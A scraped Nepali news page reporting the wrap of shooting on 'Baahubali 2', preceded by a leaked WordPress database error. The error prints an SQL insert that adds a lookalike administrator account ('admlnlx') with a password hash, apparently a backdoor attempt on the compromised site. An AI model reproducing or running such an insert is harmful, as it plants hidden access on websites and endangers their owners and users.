WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BOu9J/SbZVN4ix8iFzUO6xT70jeLPY/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-13 14:38:03', '', 'admlnlx', 'admlnlx')
पुस २८ –
सुटिङको अन्तिम दिन निर्देशक राजामौलीदेखि फिल्म युनिट रमाइलो गरिरहेका देखिए ।
ब्लकबस्टर चलचित्र ‘बाहुबली’ ले सन् २०१५ मा ५०० करोडको कमाइ गरेको थियो । चलचित्रमा तेलुगु स्टार प्रभासले शीर्ष भूमिका निर्वाह गरेका थिए । उनीसँगै अनुष्का सेट्टीसमेत शीर्ष भूमिकामा देखिएकी थिइन् ।
यद्यपि उनले आमाको चरित्र अभिनय गरेकी थिइन् ।
अब ठूलो पर्दामा ‘बाहुबली २’ धमाका मच्चाउने तयारीमा छ । र, दर्शकहरुले यो प्रश्नको उत्तर पनि पाउने छन् कि, अन्ततः कटप्पाले बाहुबलीलाई किन मारेको थियो रु
चलचित्र यसै वर्षको अप्रिलमा रिलिज हुनेछ । सुटिङको अन्तिम दिन निर्देशक, हिरोदेखि चलचित्र युनिटका सबै सदस्य रमाइलो गरिरहेका देखिन्थे ।

